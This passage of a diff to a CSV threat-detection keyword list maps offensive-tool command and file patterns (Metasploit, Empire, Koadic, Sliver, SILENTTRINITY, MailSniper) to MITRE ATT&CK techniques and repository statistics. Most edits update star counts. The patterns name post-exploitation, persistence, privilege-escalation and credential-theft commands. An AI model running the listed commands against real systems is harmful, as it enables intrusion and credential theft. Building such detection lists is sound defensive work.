T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*UnwindInspector.exe*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" -"*Update-ExeFunctions*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*upload-dll * *.dll*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","N/A","10","3","228","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*Update-ExeFunctions*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*upload-dll * *.dll*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*UploadFileImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*UrbanBishop.exe*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*UrbanBishop.exe*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*ursnif_IcedID.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*USBPcap*","offensive_tool_keyword","usbpcap","USB capture for Windows.","T1115 - T1129 - T1052","TA0003 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" -"*use exploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*use exploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*use implant/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*use incognito*","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*use powershell_stageless*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*use safetykatz*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*use stager/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*UseBeaconCmd*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*UseBeaconCmd*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*uselistener dbx*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*uselistener onedrive*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*usemodule persistence/*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*usemodule powershell/persistence*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*usemodule privesc/*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*usemodule persistence/*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*usemodule powershell/persistence*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*usemodule privesc/*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*useplugin csharpserver*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*UsePrtAdminAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*UsePrtImperonsationAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*user Inveigh*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 